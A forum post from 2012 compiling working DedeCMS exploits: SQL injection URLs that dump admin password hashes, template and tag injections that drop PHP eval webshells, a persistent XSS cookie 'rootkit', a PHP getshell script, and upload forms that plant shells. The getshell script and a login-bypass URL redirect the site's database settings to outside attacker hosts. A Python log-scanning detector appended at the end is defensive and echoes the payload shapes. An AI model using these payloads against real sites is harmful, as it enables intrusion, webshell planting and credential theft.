DedeCMS vulnerability roundup
Posted by the thread starter on 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a software entry; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php with password xiao, a one-line webshell written straight to disk.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe;
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and open it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; whichever of the URLs below you open afterwards, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 privilege bypass vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
The precondition for this vulnerability is that the backend path must be known.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, post an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Post an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5; to get the 16-character MD5 from that, remove 3 more from the front and 1 from the end.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS logging database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.
2. Visit
http://www.abc.com/data/mysql_error_trace.php
Seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
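Every PoC in this post leaves a recognisable request shape in the web server's access log: a GLOBALS override in a cookie or POST parameter, a sql= parameter to advancedsearch.php, updatexml() in an rss.php query, a script tag in gotopage, ../ in oldface or code, or a {dede:...} tag in request data. The detector below is an added example written for this page, not code from the post; the log lines, IPs, timestamps and rule names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines: combined log format with an optional trailing
# quoted field carrying the POST body. Hosts, IPs and times are made up; the request
# shapes mirror the PoCs listed in the post above.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23'][0]=1 HTTP/1.1" 200 512
10.0.0.6 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048
10.0.0.7 - - [18/Oct/2012:10:44:10 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 77 "doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9"
10.0.0.8 - - [18/Oct/2012:10:45:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.9 - - [18/Oct/2012:10:46:30 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 100
10.0.0.10 - - [18/Oct/2012:10:47:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+(?: "(?P<extra>[^"]*)")?'
)

# One rule per attack pattern from the post; the labels are my own names.
RULES = [
    ("globals-override",     re.compile(r"_(COOKIE|POST|GET)\[GLOBALS\]\[cfg_", re.I)),
    ("register-globals-cfg", re.compile(r"(^|[?&])cfg_(basedir|imgtype|softtype|mediatype|not_allowall)=", re.I)),
    ("advancedsearch-sql",   re.compile(r"/plus/advancedsearch\.php\?(?:.*&)?sql=", re.I)),
    ("rss-updatexml",        re.compile(r"/plus/rss\.php\?.*updatexml\s*\(", re.I)),
    ("gotopage-xss",         re.compile(r"[?&]gotopage=[^&]*<script", re.I)),
    ("path-traversal",       re.compile(r"[?&](oldface|code)=[^&]*\.\./", re.I)),
    ("dede-tag-in-request",  re.compile(r"\{/?dede:\w+", re.I)),
]


def decode(s):
    """Percent-decode up to three rounds so double-encoded payloads still match."""
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line):
    """Return {'ip', 'target', 'labels'} for a parsable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Match against the decoded query string and the decoded POST body together.
    haystack = decode(m["target"]) + " " + decode(m["extra"] or "")
    labels = [name for name, rx in RULES if rx.search(haystack)]
    return {"ip": m["ip"], "target": m["target"], "labels": labels}


def scan(log_text):
    """Return only the records that matched at least one rule, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["labels"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], ",".join(rec["labels"]), rec["target"][:60])
```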